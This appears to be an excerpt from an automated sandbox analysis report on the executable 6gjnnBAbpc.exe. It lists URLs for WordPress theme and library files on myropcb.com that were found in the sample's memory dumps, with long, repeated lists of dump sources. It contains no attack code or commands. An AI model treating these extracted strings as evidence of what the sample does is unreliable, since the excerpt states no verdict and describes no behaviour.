                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/js/easySlider.js
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/js/jquery-ui.min.js
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/style.css
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/thematic/library/scripts/hoverIntent.js
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/thematic/library/scripts/superfish.js
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/thematic/library/scripts/supersubs.js
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/thematic/library/scripts/thematic-dropdowns.js
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.11
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/wlwmanifest.xml
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.465287459.0000000008D97000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.464489393.0000000008D61000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.333008412.0000000008D7C000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-json/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.myropcb.com%2F
